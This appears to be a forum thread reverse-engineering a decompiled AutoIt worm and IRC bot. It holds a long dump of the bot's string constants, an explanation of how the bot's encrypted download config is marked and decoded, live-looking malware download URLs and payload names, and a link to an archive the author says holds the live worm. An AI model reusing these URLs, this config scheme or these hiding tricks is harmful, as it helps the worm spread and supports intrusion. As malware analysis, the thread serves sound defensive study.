$gConst00D0    "3[filelist]="
$gConst00D1    "3[filesize] "
$gConst00D2    "3[X] $siteusb "
$gConst00D3    "GetLastInputInfo"
$gConst00D4    "ZZMCKL542Z5813ZX"
$gConst00D5    """  | find /v "":"
$gConst00D6    "Z4N4X4M5V4C78BV"
$gConst00D7    "ShowSuperHidden"
$gConst00D8    "del suicide.bat"
$gConst00D9    "InternetOpenUrl"
$gConst00DA    "getallwintitles"
$gConst00DB    " 3[channel]2 "
$gConst00DC    " 3[authhost]4"
$gConst00DD    " 3[botpass]4 "
$gConst00DE    " 3Srv_Pack=2 "
$gConst00DF    " MB 3Type=12 "
$gConst00E0    "PrPf8Ms55BL456M"
$gConst00E1    "cometerharakiri"
$gConst00E2    "NOT Closed!!4 "
$gConst00E3    "msnlifecontacts"
$gConst00E4    "X5X14dMnb4b44bf"
$gConst00E5    "X5X14dMnb4b44bo"
$gConst00E6    "EmptyWorkingSet"
$gConst00E7    "ll9865sdzxNsj8"
$gConst00E8    "KzDLzS5c47zSDN"
$gConst00E9    ", 3Size=4 "
$gConst00EA    " 3InternIP4 "
$gConst00EB    "3[botpass]4 "
$gConst00EC    "3[botnick]4 "
$gConst00ED    " 3OSBuild=2 "
$gConst00EE    "3[Drive12 "
$gConst00EF    " 3Status=12 "
$gConst00F0    "harakirimaster"
$gConst00F1    ", Minutes:4 "
$gConst00F2    ", Seconds:4 "
$gConst00F3    "logger set off"
$gConst00F4    "HK reg cleaned"
$gConst00F5    "3[filetime]"
$gConst00F6    "10[Plugin]"
$gConst00F7    "3[X] $ircon "
$gConst00F8    "3[X] $siten "
$gConst00F9    " /c dir /b /a "
$gConst00FA    ":Closing Link:"
$gConst00FB    "Local AppData"
$gConst00FC    "J8K61S54DPPLX"
$gConst00FD    "Explorer.exe "
$gConst00FE    " /c net view "
$gConst00FF    "Closewintitle"
$gConst0100    "3[User]4 "
$gConst0101    "3[server]4 "
$gConst0102    "Regstartupspy"
$gConst0103    "logger set on"
$gConst0104    "configuration"
$gConst0105    "Vz5R78yE8w1Gx"
$gConst0106    " /o-e /od > """
$gConst0107    "\winlogon.exe"
$gConst0108    "lMKNn84jjbvH"
$gConst0109    "D7G445SdxFDC"
$gConst010A    "cleanusb inf"
$gConst010B    "CheckedValue"
$gConst010C    "Explorer.exe"
$gConst010D    "\suicide.bat"
$gConst010E    "InternetOpen"
$gConst010F    "GetLastError"
$gConst0110    ", 3IP=4 "
$gConst0111    " New IP4 "
$gConst0112    "getwintitles"
$gConst0113    " 3[PC]4 "
$gConst0114    "kill-country"
$gConst0115    "kernel32.dll"
$gConst0116    " 3Size=12 "
$gConst0117    "NN654X564BBV"
$gConst0118    "Drive2System"
$gConst0119    ", Hours:4 "
$gConst011A    "TeaTimer.exe"
$gConst011B    "shellexecute"
$gConst011C    "\autorun.inf"
$gConst011D    "GetTickCount"
$gConst011E    "\netstat.bat"
$gConst011F    "Kernel32.dll"
$gConst0120    "kernel32.dll"
$gConst0121    "SuperHidden"
$gConst0122    "VEgXx1013dx"
$gConst0123    "MNBVCCX5454"
$gConst0124    """ goto loop"
$gConst0125    "?action=log"
$gConst0126    "wininet.dll"
$gConst0127    "CreateMutex"
$gConst0128    "alokium.exe"
$gConst0129    "3[Keepup]"
$gConst012A    "LL87S64888Z"
$gConst012B    "autorun.inf"
$gConst012C    "3[OS]2 "
$gConst012D    " 3Lang=2 "
$gConst012E    "ProcessList"
$gConst012F    "KillProcess"
$gConst0130    "netbioscopy"
$gConst0131    "filevercion"
$gConst0132    "desconocido"
$gConst0133    "Cannot join"
$gConst0134    "OpenProcess"
$gConst0135    "CloseHandle"
$gConst0136    "PA21V321BD"
$gConst0137    "TosS587GhM"
$gConst0138    "if exist """
$gConst0139    "secuential"
$gConst013A    "K7K8K5K1V3"
$gConst013B    "FileDelete"
$gConst013C    "Old IP4 "
$gConst013D    "DisableIRC"
$gConst013E    "Psj45a7scl"
$gConst013F    "IPspreader"
$gConst0140    "KDLS547SDN"
$gConst0141    "$com[10]= "
$gConst0142    "$com[11]= "
$gConst0143    "$com[12]= "
$gConst0144    "$com[13]= "
$gConst0145    "$com[14]= "
$gConst0146    "K7K8K5K1V2"
$gConst0147    "K7K8K5K1V4"
$gConst0148    "Usb2System"
$gConst0149    "IRC-remove"
$gConst014A    "K7K8K5K1V5"
$gConst014B    "4iplocales"
$gConst014C    "fileattrib"
$gConst014D    "randompick"
$gConst014E    "cftmen.exe"
$gConst014F    "Portuguese"
$gConst0150    "uint;dword"
$gConst0151    "user32.dll"
$gConst0152    "Your ip is"
$gConst0153    "explorer "
$gConst0154    "REMOVABLE"
$gConst0155    " and 4 "
$gConst0156    "refreship"
$gConst0157    "csrcs.au3"
$gConst0158    "UsbSpread"
$gConst0159    "Currentip"
$gConst015A    "$com[0]= "
$gConst015B    "$com[1]= "
$gConst015C    "$com[2]= "
$gConst015D    "$com[3]= "
$gConst015E    "$com[4]= "
$gConst015F    "$com[5]= "
$gConst0160    "$com[6]= "
$gConst0161    "$com[7]= "
$gConst0162    "$com[8]= "
$gConst0163    "$com[9]= "
$gConst0164    "usbspread"
$gConst0165    "DriveInfo"
$gConst0166    "Z6FRNMML4"
$gConst0167    "reconnect"
$gConst0168    "&version="
$gConst0169    "K0i3l8l1z"
$gConst016A    "Closed4 "
$gConst016B    "Enumerate"
$gConst016C    "NTrun.au3"
$gConst016D    "DlRegExec"
$gConst016E    "csrcs.exe"
$gConst016F    "127.0.0.1"
$gConst0170    "0413,0813"
$gConst0171    "0410,0810"
$gConst0172    "0414,0814"
$gConst0173    "Norwegian"
$gConst0174    "0416,0816"
$gConst0175    "041d,081d"
$gConst0176    "[AutoRun]"
$gConst0177    "REG_DWORD"
$gConst0178    "psapi.dll"
$gConst0179    "N45ASDY4"
$gConst017A    "pclookup"
$gConst017B    "setupirc"
$gConst017C    "D7G4SFDC"
$gConst017D    "msgsplit"
$gConst017E    "Userinfo"
$gConst017F    "P71DHJK5"
$gConst0180    "Harakiri"
$gConst0181    "-RASHNOT"
$gConst0182    "\cmd.exe"
$gConst0183    "Days:4 "
$gConst0184    "Z9031fLK"
$gConst0185    "Idletime"
$gConst0186    "VnSt805f"
$gConst0187    "z99Un4Zx"
$gConst0188    "cmd.exe "
$gConst0189    "filelist"
$gConst018A    "filesize"
$gConst018B    "https://"
$gConst018C    "filetime"
$gConst018D    "Modified"
$gConst018E    "Accessed"
$gConst018F    "W-remove"
$gConst0190    "cftm.exe"
$gConst0191    "randomAZ"
$gConst0192    "Dlplugin"
$gConst0193    "RECYCLER"
$gConst0194    "Recycled"
$gConst0195    "\~ip.tmp"
$gConst0196    "KZ54777y"
$gConst0197    "PI4b6dmM"
$gConst0198    "N7DK651O"
$gConst0199    "Netbios"
$gConst019A    "Country"
$gConst019B    "goTnick"
$gConst019C    "output2"
$gConst019D    "cmd.exe"
$gConst019E    "NETWORK"
$gConst019F    "RAMDISK"
$gConst01A0    "UNKNOWN"
$gConst01A1    "country"
$gConst01A2    "rem_inf"
$gConst01A3    "invalid"
$gConst01A4    "Xio90kK"
$gConst01A5    "Process"
$gConst01A6    "fix_inf"
$gConst01A7    "pc-user"
$gConst01A8    "http://"
$gConst01A9    "vercion"
$gConst01AA    "getplis"
$gConst01AB    "Regread"
$gConst01AC    "Created"
$gConst01AD    "http://"
$gConst01AE    "zZ45sAs"
$gConst01AF    "net.exe"
$gConst01B0    "English"
$gConst01B1    "borrado"
$gConst01B2    "Italian"
$gConst01B3    "todrive"
$gConst01B4    "toshare"
$gConst01B5    "Spanish"
$gConst01B6    "Swedish"
$gConst01B7    "\s*;\s*"
$gConst01B8    "PRIVMSG"
$gConst01B9    "Error: "
$gConst01BA    "Error :"
$gConst01BB    "privmsg"
$gConst01BC    "Zw888Y"
$gConst01BD    "delete"
$gConst01BE    "V8e74y"
$gConst01BF    "Xz0014"
$gConst01C0    "input2"
$gConst01C1    "&host="
$gConst01C2    "&user="
$gConst01C3    "OsInfo"
$gConst01C4    "&type="
$gConst01C5    " 0 0 :"
$gConst01C6    "pcinfo"
$gConst01C7    "&name="
$gConst01C8    "Keepup"
$gConst01C9    "&port="
$gConst01CA    "Uptime"
$gConst01CB    "noname"
$gConst01CC    "logger"
$gConst01CD    "xKw977"
$gConst01CE    "Delete"
$gConst01CF    "udword"
$gConst01D0    "REG_SZ"
$gConst01D1    " a4 "
$gConst01D2    " ,IP2="
$gConst01D3    " ,IP3="
$gConst01D4    " ,IP4="
$gConst01D5    "logout"
$gConst01D6    "plugin"
$gConst01D7    "output"
$gConst01D8    "values"
$gConst01D9    "Zx0Xz8"
$gConst01DA    "regexp"
$gConst01DB    "cftmam"
$gConst01DC    "insane"
$gConst01DD    "Online"
$gConst01DE    "French"
$gConst01DF    "German"
$gConst01E0    "Polish"
$gConst01E1    "U15W1s"
$gConst01E2    "&rnd2="
$gConst01E3    ";start"
$gConst01E4    "PING :"
$gConst01E5    "PING :"
$gConst01E6    "random"
$gConst01E7    "Hidden"
$gConst01E8    "banned"
$gConst01E9    "u15wab"
$gConst01EA    "CDROM"
$gConst01EB    "error"
$gConst01EC    " 12 "
$gConst01ED    "Viz91"
$gConst01EE    " MB."
$gConst01EF    " :4 "
$gConst01F0    "READY"
$gConst01F1    "Write"
$gConst01F2    "Shell"
$gConst01F3    "del """
$gConst01F4    "loop:"
$gConst01F5    "stats"
$gConst01F6    "@crlf"
$gConst01F7    "login"
$gConst01F8    "input"
$gConst01F9    "csrcs"
$gConst01FA    "@#$€&"
$gConst01FB    "+RASH"
$gConst01FC    "-RASH"
$gConst01FD    "Dutch"
$gConst01FE    "Fixed"
$gConst01FF    "start"
$gConst0200    "eggol"
$gConst0201    "\w:\\"
$gConst0202    "FIXED"
$gConst0203    "7sa4z"
$gConst0204    "leave"
$gConst0205    "LEAVE"
$gConst0206    "open="
$gConst0207    "exp1"
$gConst0208    "view"
$gConst0209    "name"
$gConst020A    "ilop"
$gConst020B    "icon"
$gConst020C    "cftm"
$gConst020D    "lang"
$gConst020E    ".exe"
$gConst020F    "prtu"
$gConst0210    "Vx01"
$gConst0211    "JOIN"
$gConst0212    "NICK"
$gConst0213    "none"
$gConst0214    "hhvd"
$gConst0215    ".au3"
$gConst0216    "Read"
$gConst0217    "rem1"
$gConst0218    " /c "
$gConst0219    "nick"
$gConst021A    "user"
$gConst021B    "IP1="
$gConst021C    "fix1"
$gConst021D    "done"
$gConst021E    "nech"
$gConst021F    "mail"
$gConst0220    "wrdn"
$gConst0221    "long"
$gConst0222    "P/ok"
$gConst0223    "VRXe"
$gConst0224    "USER"
$gConst0225    "uaht"
$gConst0226    "dreg"
$gConst0227    "ping"
$gConst0228    "stop"
$gConst0229    "0415"
$gConst022A    " > """
$gConst022B    "4 "
$gConst022C    ";end"
$gConst022D    "&pc="
$gConst022E    "join"
$gConst022F    "quit"
$gConst0230    "&ip="
$gConst0231    "PING"
$gConst0232    "PONG"
$gConst0233    "KICK"
$gConst0234    "nnam"
$gConst0235    "long"
$gConst0236    "quit"
$gConst0237    "rem"
$gConst0238    "-D]"
$gConst0239    "Reg"
$gConst023A    "R:\"
$gConst023B    "Y:\"
$gConst023C    "110"
$gConst023D    "ip2"
$gConst023E    "S:\"
$gConst023F    "Q:\"
$gConst0240    "O:\"
$gConst0241    "fix"
$gConst0242    "V:\"
$gConst0243    "-_-"
$gConst0244    "C:\"
$gConst0245    "G:\"
$gConst0246    "H:\"
$gConst0247    "J:\"
$gConst0248    "P:\"
$gConst0249    "Z:\"
$gConst024A    "reg"
$gConst024B    "-H]"
$gConst024C    "out"
$gConst024D    "dsn"
$gConst024E    "N:\"
$gConst024F    "   "
$gConst0250    "Rem"
$gConst0251    "PC["
$gConst0252    "X:\"
$gConst0253    "khr"
$gConst0254    "Add"
$gConst0255    "T:\"
$gConst0256    "int"
$gConst0257    "M:\"
$gConst0258    "ALL"
$gConst0259    "IP?"
$gConst025A    "F:\"
$gConst025B    "D:\"
$gConst025C    "W:\"
$gConst025D    "int"
$gConst025E    "L:\"
$gConst025F    "str"
$gConst0260    "ptr"
$gConst0261    "kin"
$gConst0262    "*.*"
$gConst0263    "E:\"
$gConst0264    "*@*"
$gConst0265    "UP["
$gConst0266    "off"
$gConst0267    "4 "
$gConst0268    "I:\"
$gConst0269    "U:\"
$gConst026A    "K:\"
$gConst026B    "dos"
$gConst026C    "ips"
$gConst026D    "GC["
$gConst026E    "kiu"
$gConst026F    "PR["
$gConst0270    "WT["
$gConst0271    "str"
$gConst0272    "ptr"
$gConst0273    "UPD"

That's what I finally got out:

Ah yes before before anyone complains later:
This Dl is Virus/Worm - so carefull !

csrcs_HaRaKiRi_WoRmBot.rar

edit add
I was a little curious about that one and wondered what the lines like these:

Code: Select all

      $Var00B7 = StringRegExp($Downloaded, "D7G445SdxFDC", 0)
      $Var00B8 = StringRegExp($Downloaded, "KzDLzS5c47zSDN", 0)

are good for. ( My thoughts: Does this De/encrypt with StringRegExp - or what? )

The only url( there were of course a bit encrypted like that: Fn000C(0, "408178571CB7BBE0DC1D7B2D0C42B9AEF2F90AEEB154D0C5BCB81075419395F01C914AD60EB673C15FCBFBF3EC34271B8624D15A1ED50CCF86D78DD67A7A1A9DE123A6219AF1EF57624D6E9C92039C534AF51C8BDA73AFFC6262E0C1C1DDB7E5C73935413F9FD764317C4DD0133331AFBED6B4DE974FDD160BCE2C3E502C8EC3FAE8D5B7E327E509", $Var0096, 2)) that still was online was this: "http://sousi.extasix.com/genst.htm"
On the first look this looked very cryptic:

Code: Select all

<zZ45sAsM8Y77V69S8488S689O99QD7G445SdxFDC408406511BC5BCE4DC197B2F0C45C5ABF2F90DEEB151D7C7BCBD1072419390F662E634D70EB273C45FCEFCF5EC312618KzDLzS5c47zSDNX5X14dMnb4b44bfFAq9PKZr3vC6sdS4FJ8ker64V1Edf6DS54Fa6G4Kgg5Dr25408178571CB7BBE0DC1D7B2D0C42B9AEF2F90AEEB154D0C5BCB81075419395F01C914AD60EB673C15FCBFBF3EC34271B8624D15A1ED50CCE86D48DD77A7A1A99E657A6519AF6EF25624E6F9A95749C544A8E1DFCDA73AF8F6262E0C3C1DDB798C73935413F9FD76A317C4DD1133331A9BED3B1DA974FDD120BCA2C475052F2C2FAEDD5B3E327E57EAC038FB79B5484538EE2B66BBD4625F59DCEC65B626C80AF3FA5D877548F9CE44B541E5BB952FD6520E91A156BE3D054430895C47B73E25DA49C466717D93BBC1358F484B8FFD8128B7597B296B7779229C1A71F9658E4DE4BECB19804937F7C932DD5B64AF7430F9BB7DCE12103EAFB47923F750DFE6B4337213E5A56228AEAC50C7B8CDFA72CF58460ECD4283682CAE72897A1A2598E27D94762FBA6SD54g984rhwhhswpd8581dsf681g6bn5146S1468d>


However when searching for 'zZ45' in the source code it hit inside on of these mysterious StringRegExp.
$Var0072 = StringRegExp($Downloaded, "zZ45sAs", 0)
If it's there $Var0072 gets 1 else it's 0. But let's look for something more exciting like data.
For ex 'Sdx' got me here:

Code: Select all

   $Var0096 = "A0P52MA78LS9O7EN1UI89A7B9NP6254FU1E3NA2S154HQ987"
       ...
         $Var00B9 = "D7G445SdxFDC"
         $Var00BA = "KzDLzS5c47zSDN"
         $Var004C = Fn000B($Downloaded, $Var00B9, $Var00BA, $Var0096)

After renaming:
   $EncKey = "A0P52MA78LS9O7EN1UI89A7B9NP6254FU1E3NA2S154HQ987"
       ...
         $Marker1Start= "D7G445SdxFDC"
         $Marker1End= "KzDLzS5c47zSDN"
         $StrData= StrCrop($Downloaded, $Marker1Start, $Marker1End, $EncKey)



so these StringRegExp() strings were just marker.
Well so it cleared up more and more and I was able to sequenceate (& later identify) the data:

Code: Select all

<
   zZ45sAs ; $Var0072 Do not DL "http://ZkArMy.dip.jp/oolksh.htm"

   M8Y77V69S8488S689O99Q ;$Var0083 -> Do "192.168~10.1" thing
      D7G445SdxFDC
         ;$Var004C = 192.168~10.1
         408406511...<snip>...312618
      KzDLzS5c47zSDN

   X5X14dMnb4b44bf ;$Var0080    ->"logger set off" (RegWrite($Var002E, "eggol", "REG_SZ", "0");   $Var004B = 0)

   FAq9PKZr3vC6sdS4FJ8ker64V1Edf6DS54Fa6G4Kgg5Dr25
      ;$Var004C = http://sousi.dip.jp/iiii/idl.php cftuon.exe 495096 9.8.0.6 hk9x 1 yy-.exe
      408178571CB7BBE0DC1D7B...<snip>...27D94762FB
   A6SD54g984rhwhhswpd8581dsf681g6bn5146S1468d
>


about "http://sousi.dip.jp/iiii/idl.php cftuon.exe 495096 9.8.0.6 hk9x 1 yy-.exe":
   DownloadUrl: http://sousi.dip.jp/iiii/idl.php ->
   FileName:cftuon.exe
   FileGetSize: 495096
   FileVersion: 9.8.0.6
   RegWriteName: hk9x
   RandomNameMax: 1
   DoNotStartIfProcessExists: yy-.exe


If someone is interested I also packe the 'domesticated' version into the rar-archive I used for analysing. So for there is now real nice debugger of AutoIt - however the 'Alt+d'-Tool in the SciTE(Editor that comes with AutoIt) to easy output certain var to the console is better than nothing.

That's all so far.

[cw2k]

usually its works with others script, but for it I cannot decompile them, i dont know why is working for you

I see you're use Vista.
Well it also DID work for you ! I see it on ya screenshot.
The thing is - just use the scrollbars at the left of ya editor(or the pagedown pageup key on ya keyboard).
So:
1. Have a look at the scrollbars and this newline trick won't trick you anymore
2. Press ctrl+a to uncover white text on white ground trick.
(from the Black Hackers Handbook)
^At least i think so never read it-expect the title- but I guess there is a great change to find something like this in there.